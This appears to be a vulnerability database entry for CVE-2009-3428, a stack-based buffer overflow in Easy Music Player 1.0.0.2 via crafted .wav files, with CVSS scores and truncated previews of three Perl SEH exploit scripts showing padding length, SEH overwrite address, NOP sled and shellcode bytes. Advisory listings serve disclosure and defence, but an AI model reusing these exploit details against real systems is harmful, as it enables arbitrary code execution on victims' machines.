9.3
CVSSv2

CVE-2009-3428

Published: 25/09/2009 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 945
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Easy Music Player 1.0.0.2 allows remote malicious users to execute arbitrary code via a crafted .wav file.

Vulnerable Product Search on Vulmon Subscribe to Product

otbcode easy music player 1.0.0.2

Exploits

#!/usr/bin/perl # by ahwak2000 # email: 0w[at]wcn # Easy Music Player 1002 (wav) Universal Local Buffer Exploit (SEH) # wwwotbcodecom/downloads/easymusicsetupexe ################################################################### my $shellcode= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\ ...
#!/usr/bin/perl # by hack4love # hack4love@hotmailcom # first wwwmilw0rmcom/exploits/9412 # Easy Music Player 1002 (wav) Universal Local Buffer Exploit (SEH) # wwwotbcodecom/downloads/easymusicsetupexe ############################################################################ my $bof="\x41" x 4132; my $nsh="\xEB\x06\x90\x90 ...
#!/usr/bin/perl # by ThE g0bL!N #Big thnx: His0k4 #easy Music Player 1002(wav) local Buffer Overflow Exploit (SEH) ################################################################## my $bof="\x41" x 4132; my $nsh="\xEB\x06\x90\x90"; my $seh="\xB8\x15\xC6\x72"; my $nop="\x90" x 20; my $sec= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\ ...